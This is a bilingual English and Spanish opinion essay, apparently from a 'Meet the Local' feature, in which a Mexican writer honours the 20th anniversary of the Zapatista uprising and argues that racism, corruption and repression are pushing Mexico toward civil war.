For many outsiders, Mexico is the exotic land of their dreams, a paradise where one is surrounded by delicious street food, margaritas and hot salsa dancing. Sure, it has its problems – insecurity, corruption and the drug cartels – but to the western eye, that just makes it even more exhilarating. Being stopped by the army or the federal police while road tripping around the country is a right of passage for the western adventurer, almost as much as bungy jumping is to the tourist in New Zealand.

The truth, however, is that Mexico is within 5 years of a civil war. Centuries of corruption, ignorance and right wing catholicism, combined with what I like to call the world’s most ignored racism, rising insecurity levels and brutal state repression, have brought the country to the point of no return. The blood has been flowing for over 500 years, and it will keep flowing; only now the people, not their governors, will decide whose blood it will be.

This month marks the 20^th anniversary of the Zapatista uprising in Mexico. Twenty years ago, when the Mexican government sold our soul by signing the NAFTA treaty (A free trade agreement between USA, Canada and Mexico), a rebellion broke out. A dignified rebellion, they called it. The EZLN (the Zapatista Army of National Liberation), a Mayan indigenous army from the south of Mexico, declared war upon the Mexican Government. They won absolute autonomy for their territories, and have now restored the values, culture and vision of the world of their ancestors.

They have tackled the problem of alcoholism amongst the male population, they are building schools with new curriculums that serve the needs of the local people, and not those of the west, and they have their own army with the capacity to defend their interests. In other words they are giving the people back their dignity – exactly what the country needs.

There is a huge problem though. Before the rebellion no one knew they existed. The entire country had decided to forget them, because our education system taught us (and still does) that everything Indian is inferior. We’ve been taught that we no longer have a connection to them: We as Mestizos (mixed race Mexicans) must do our best to try and become like our European masters. Centuries of this education have left the country in a state of fragmentation that is so chaotically painful. Today, as our struggles overwhelm us, the middle classes are all wondering: Who will come to save us? Who will do something about our problems? They deny the EZLN revolution and its successes, as they believe it is not for them; they are not Indian.

I hope these words serve as a reminder to all Mexican people of the importance of sticking together in the hard times ahead, as well as a reminder that a hugely important and unprecedented space for change has already been opened up by the Zapatista communities. It would be foolish to ignore it.

I hope they also serve as a warning to all the members of the middle classes and the Mexican establishment who will do everything they can to resist such a change. Anything you do to uphold this current system is treason, not only to the people of Mexico, but also to the people of the American continent who have been dominated for so long. I hope through this conflict we find unity and peace.

In honour of all the women and men of the Zapatista Army of National Liberation, in this month of the 20th anniversary of the uprising, I salute you. And I thank you, because you forced me to wake up, and you gave me back my pride. My passport might tell the world I’m a Mexican, but in my heart I am a Zapatista.

MEET THE LOCAL: ROMMEL CESEÑA

Para muchos extranjeros, Mexico es una tierra exótica de ensueño, un paraíso rodeado de deliciosa comida callejera, Margaritas y gente bailando salsa. Claro que tiene sus problemas – La inseguridad, corrupción y los cárteles del narcotráfico – Pero para el ojo occidental, esto es lo que hace a Mexico un lugar mas emocionante. Para el aventurero occidental, ser detenidos por el ejército o la policía federal en un reten en la carretera es como un rito de paso casi como saltar del bungy lo es para el turista en Nueva Zelanda.

La verdad es que Mexico esta como a 5 años de una guerra civil. Siglos de corrupción, ignorancia, un catolicismo de ultra derecha, combinados con lo que a mi me gusta llamar “el racismo mas ignorado del mundo”, los crecientes niveles de inseguridad y una represión brutal por parte del estado han traído al país a un punto donde ya no hay vuelta atrás. La sangre ha sido derramada por mas de 500 años y va a seguir corriendo; la diferencia es que ahora el pueblo y no sus gobernantes van a decidir de quien va a ser la sangre.

Este mes marca el 20 aniversario del levantamiento Zapatista en Mexico. Hace 20 años cuando el gobierno Mexicano vendió nuestra alma al firmar el TLC (el Tratado de Libre Comercio entre EUA, Canada y Mexico) explotó una rebelión. Le llamaron una rebelión digna.

El EZLN (Ejercito Zapatista de Liberación Nacional), un ejercito Indígena, Maya, del sur de Mexico, declaro la guerra al gobierno Mexicano. Ganaron la absoluta autonomía de sus territorios, están restaurando nuestros valores,

nuestra cultura y la visión de nuestros ancestros. Han solucionado el problema del alcoholismo en sus territorios, están construyendo escuelas con currículos nuevos que atienden las necesidades de su gente y no aquellas del occidente y tienen su propio ejército capaz de defender sus intereses. En otras palabras, le han regresado la dignidad a nuestra gente – Exactamente lo que el país entero necesita.

Pero existe un problema aun mas grande en el país. Antes de que la rebelión estallara nadie sabia de que existían los pueblos indios. El país entero había decidido olvidarlos porque el sistema educativo Mexicano nos enseñaba (y todavía lo hace) que toda lo referente a los pueblos indios es inferior. Bajo su política de Mestizaje nos enseñan que ya no tenemos una conexión con nuestros ancestros y que debemos hacer lo posible para ser civilizados como nuestros maestros Europeos occidentales. Siglo tras siglo de esta educación dejaron un pueblo fragmentado viviendo un caos doloroso. Hoy mientras la inseguridad y la corrupción crecen las clases medias creen que la solución esta en adoptar los modelos políticos de occidente pues en su mente “son superiores” y “funcionan” ignorando que aquellos son el problema de raíz. Algunos de ellos se preguntan: “Quien nos va a salvar?” o “Quien va a hacer algo para solucionar estos problemas?” Niegan descaradamente la revolución del EZLN y su éxito pues creen que no es para ellos; porque ellos no son indios, son mestizos…son Mexicanos.

Espero que estas palabras sirvan de recordatorio para todos los Mexicanos de la importancia de mantenernos unidos y reconocer el pasado de la nación y enorgullecernos en estos tiempos difíciles que se avecinan para poder reconstruir una nación unificada. También espero que sea un recordatorio de que un espacio inmensamente importante y sin precedentes para el cambio ya ha sido abierto por las comunidades Zapatistas. Sería un error estúpido ignorarlo nuevamente.

Espero que sea una advertencia a los miembros de las clases medias Mexicanas y los miembros del “establishment” quienes harán lo posible para resistir el cambio. Cualquier esfuerzo que hagan para mantener el sistema existente es traición no solo para el pueblo de Mexico sino hacia toda la gente del continente Americano que ha sido víctima del dominio occidental por tanto tiempo. Espero que en este conflicto encontremos unidad y paz.

En honor a todas las mujeres y hombres del Ejercito Zapatista de Liberación Nacional, en este mes del aniversario del levantamiento, yo los saludo y les agradezco, pues ustedes me hicieron despertar y me regresaron mi orgullo. Mi pasaporte le dice al mundo que soy Mexicano, pero mi corazón sabe que soy Zapatista.
